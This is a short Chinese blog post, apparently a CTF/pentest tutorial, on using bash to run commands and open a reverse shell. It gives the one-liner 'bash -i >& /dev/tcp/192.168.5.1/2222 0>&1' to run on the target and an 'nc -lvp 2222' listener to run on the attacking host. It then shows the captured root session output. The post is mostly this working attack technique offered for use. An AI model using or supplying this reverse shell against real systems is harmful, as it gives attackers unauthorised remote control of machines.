bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell!
基本使用语法
bash -c 命令
root@kali:~# bash -c whoami root root@kali:~#
另外使用-i表示以交互方式运行shell,通常在目标主机上运行
bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
然后另一台主机使用nc进行监听该端口,即可获取到一个shell!
目标主机:
root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
攻击主机:
F:\\eth10-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222 lstn on [any] 2222 .. 192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA root@kali:~# uname -a uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:~# whoami whoami root root@kali:~#exit
本文出自 “eth10” 博客,请务必保留此出处http://eth10.blog.51cto.com/13143704/1960279
原文地址:http://eth10.blog.51cto.com/13143704/1960279
